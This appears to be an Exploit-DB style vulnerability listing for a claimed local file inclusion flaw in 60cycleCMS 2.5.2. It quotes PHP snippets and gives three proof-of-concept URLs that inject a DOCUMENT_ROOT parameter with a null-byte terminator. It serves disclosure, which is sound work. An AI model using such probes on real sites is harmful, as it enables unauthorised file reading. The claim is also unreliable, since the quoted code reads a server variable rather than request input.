60cycleCMS v2.5.2 (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

vendor:

60cycleCMS

by:

eidelweiss

7,5

CVSS

HIGH

Multiple Local File Inclusion

CWE

Product Name: 60cycleCMS

Affected Version From: 2.5.2

Affected Version To: 2.5.2

Patch Exists: NO

Related CWE: N/A

CPE: 60cycleCMS

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

60cycleCMS v2.5.2 (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

60cycleCMS v2.5.2 is vulnerable to multiple local file inclusion. The vulnerability is located in the 'DOCUMENT_ROOT' parameter of the 'config.php' file. The attacker can include local files with the help of directory traversal techniques.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

########################################################
 
    fucking the Web Apps [attack edition]
 
 ____                  __                              __    __               
/\  _`\               /\ \      __                    /\ \__/\ \              
\ \ \L\_\__  __    ___\ \ \/'\ /\_\    ___      __    \ \ ,_\ \ \___      __  
 \ \  _\/\ \/\ \  /'___\ \ , < \/\ \ /' _ `\  /'_ `\   \ \ \/\ \  _ `\  /'__`\
  \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \   \ \ \_\ \ \ \ \/\  __/
   \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \   \ \__\\ \_\ \_\ \____\
    \/_/  \/___/  \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \   \/__/ \/_/\/_/\/____/
                                                /\____/                       
                                                \_/__/                        
 __      __          __          ______                       By: eidelweiss
/\ \  __/\ \        /\ \        /\  _  \                          
\ \ \/\ \ \ \     __\ \ \____   \ \ \L\ \  _____   _____     ____ 
 \ \ \ \ \ \ \  /'__`\ \ '__`\   \ \  __ \/\ '__`\/\ '__`\  /',__\
  \ \ \_/ \_\ \/\  __/\ \ \L\ \   \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
   \ `\___x___/\ \____\\ \_,__/    \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
    '\/__//__/  \/____/ \/___/      \/_/\/_/\ \ \/  \ \ \/  \/___/
                                             \ \_\   \ \_\        
                                              \/_/    \/_/         


[+]Title:	60cycleCMS v2.5.2 (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability
[+]Version:	2.5.2
[+]Download:	http://php.opensourcecms.com/scripts/details.php?scriptid=337
[+]License:	New BSD (http://www.opensource.org/licenses/bsd-license.php)
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com	

	[!]Thank`s To: All Friends

########################################################

[!] Descriptsion

60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written to power 60cycle.net. 
For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template. 


[!]-=[ Vuln C0de ]=-[!]

[-]  60cycleCMS_path/news.php

	<?php

	require 'common/lib.php';
	$root = $_SERVER['DOCUMENT_ROOT'];
	require_once("$root/../config.php");



[-] 60cycleCMS_path/submitComment.php

	<?php
	session_start();
	require_once('lib/recaptchalib.php');
	require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');
	$root = $_SERVER['DOCUMENT_ROOT'];
	require_once("$root/../config.php");


[-] 60cycleCMS_path/common/sqlConnect.php

	<?php

	// include your sql info file here
	$root = $_SERVER['DOCUMENT_ROOT'];
	require "$root/../config.php";


	[!] -=[ Proof Of Concept ]=-[!]

	http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
	http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00
	http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00

########################################################